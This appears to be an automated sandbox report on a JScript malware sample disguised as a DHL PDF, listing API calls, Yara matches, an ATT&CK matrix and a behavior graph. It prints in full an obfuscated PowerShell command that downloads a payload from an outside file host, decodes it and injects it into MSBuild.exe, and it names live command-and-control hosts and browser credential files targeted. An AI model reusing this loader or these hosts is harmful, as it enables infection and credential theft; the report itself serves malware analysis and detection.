          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424 | Thread sleep count: 8718 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424 | Thread sleep time: -26154000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_0041A01B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_0040B28E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_0040838E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_004087A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_00407848
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004068CD FindFirstFileW,FindNextFileW, 8_2_004068CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0044BA59 FindFirstFileExA, 8_2_0044BA59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_0040AA71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_00417AAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_0040AC78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_00406D28
          Source: powershell.exe, 00000002.00000002.2500458772.0000016F7E011000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWawDe%SystemRoot%\system32\mswsock.dll "FileSystemRights" = [System.Security.AccessControl.FileSystemRights]
          Source: wscript.exe, 00000001.00000002.2305799629.000002309F0B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e%
          Source: wscript.exe, 00000001.00000002.2305119705.000002309E429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2305799629.000002309F0B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.000000000127D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000001.00000002.2305119705.000002309E429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW!F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | API call chain: ExitProcess graph end node graph_8-47835
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_004327AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041A8DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004407B5 mov eax, dword ptr fs:[00000030h] 8_2_004407B5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 8_2_00410763
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004328FC SetUnhandledExceptionFilter, 8_2_004328FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_004398AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00432D5C

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\wscript.exe | Network Connect: 23.186.113.60 443
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46E000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 474000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 475000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C8E008
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_00410B5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004175E1 mouse_event, 8_2_004175E1
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$uucrpclgmlldzklglzch = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khugfwkclcfbkpjrgwto = $uucrpclgmlldzklglzch -replace '#', 't';$boksbmcmwwtzwevwaoqx = 'https://3005.filemail.com/api/file/get?filekey=nix_5t0lxhobjilnb9crviabpjrw2dlc-lxeodjpf_z_1mp6cuqbs5kcpta&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqglwpwlepgltbgwki = new-object system.net.webclient;$utrgglzewzaiuklalckk = $qkoqglwpwlepgltbgwki.downloaddata($boksbmcmwwtzwevwaoqx);$kznfbhlakweixbikolmf = [system.text.encoding]::utf8.getstring($utrgglzewzaiuklalckk);$pqgmgjhcudhptwongzoi = '<<base64_start>>';$fkbtkicqwukuckzfpsgz = '<<base64_end>>';$iwkjiplrkkzmllztwnaz = $kznfbhlakweixbikolmf.indexof($pqgmgjhcudhptwongzoi);$klqhkklolqnlpaawtufc = $kznfbhlakweixbikolmf.indexof($fkbtkicqwukuckzfpsgz);$iwkjiplrkkzmllztwnaz -ge 0 -and $klqhkklolqnlpaawtufc -gt $iwkjiplrkkzmllztwnaz;$iwkjiplrkkzmllztwnaz += $pqgmgjhcudhptwongzoi.length;$wzwcixkgqljwlkablnwb = $klqhkklolqnlpaawtufc - $iwkjiplrkkzmllztwnaz;$bqfbkpmigkpwmknxlccr = $kznfbhlakweixbikolmf.substring($iwkjiplrkkzmllztwnaz, $wzwcixkgqljwlkablnwb);$izpdconcauwpfczuwzns = [system.convert]::frombase64string($bqfbkpmigkpwmknxlccr);$gtulnokhlcioutbualkp = [system.reflection.assembly]::load($izpdconcauwpfczuwzns);$apozwguwpfkczdpksqdk = [dnlib.io.home].getmethod('vai').invoke($null, [object[]] @($khugfwkclcfbkpjrgwto,'','','','msbuild','','','','','c:\programdata\','marly','js','1','1','pessaries'))"
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\-
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\l
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\k
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager1
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS#
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001255000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\$
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\#
          Source: MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerFK\86
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004329DA cpuid 8_2_004329DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoA, 8_2_0040E2BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW, 8_2_0044F17B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW, 8_2_0044F130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW, 8_2_0044F216
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_0044F2A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW, 8_2_0044F4F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_0044F61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW, 8_2_0044F723
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_0044F7F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW, 8_2_00445914
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW, 8_2_00445E1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 8_2_0044EEB8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00404F31 GetLocalTime,CreateEventA,CreateThread, 8_2_00404F31
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004195F8 GetComputerNameExW,GetUserNameW, 8_2_004195F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_004466BF
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_0040A953
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_0040AA71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \key3.db 8_2_0040AA71

          Remote Access Functionality

          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: cmd.exe 8_2_0040567A
          MITRE ATT&CK Matrix (one row per line, 14 columns separated by " | "; a number in front of a technique is the count shown beside it in the report)

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 22 Scripting | Valid Accounts | 1 Native API | 22 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Access Token Manipulation | 13 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 211 Input Capture | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | 1 Defacement
          Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 1 DLL Side-Loading | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 322 Process Injection | 11 Masquerading | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 33 System Information Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | 113 Application Layer Protocol | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 322 Process Injection | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1619144, Sample: DHL RPA GRBP Template.PDF.js, Start date: 19/02/2025, Architecture: WINDOWS, Score: 100

          • Sample (start node): contacts paste.ee, stakloram.rs and 5 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 12 other signatures; starts wscript.exe (1 14) and a second wscript.exe
          • paste.ee: Connects to a pastebin service (likely for C&C)
          • wscript.exe: paste.ee 23.186.113.60, 443, 49762 KLAYER-GLOBALNL Reserved; signatures: System process connects to network (likely due to code injection or exploit), JScript performs obfuscated calls to suspicious functions, Suspicious powershell command line found, 3 other signatures; starts powershell.exe (14 16)
          • powershell.exe: stakloram.rs 37.27.124.176, 443, 49837 UNINETAZ Iran (ISLAMIC Republic Of); ip.3005.filemail.com 193.30.119.105, 443, 49802 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown; signatures: Writes to foreign memory regions, Injects a PE file into a foreign processes; starts MSBuild.exe (2 15), cmd.exe (1) and conhost.exe
          • MSBuild.exe: meme.linkpc.net 109.248.150.195, 3174, 49850 DATACLUBLV Russian Federation; geoplugin.net 178.237.33.50, 49861, 80 ATOM86-ASATOM86NL Netherlands; signatures: Contains functionality to change the wallpaper, Contains functionality to steal Chrome passwords or cookies, Contains functionality to register a low level keyboard hook, 3 other signatures
          • cmd.exe: starts conhost.exe
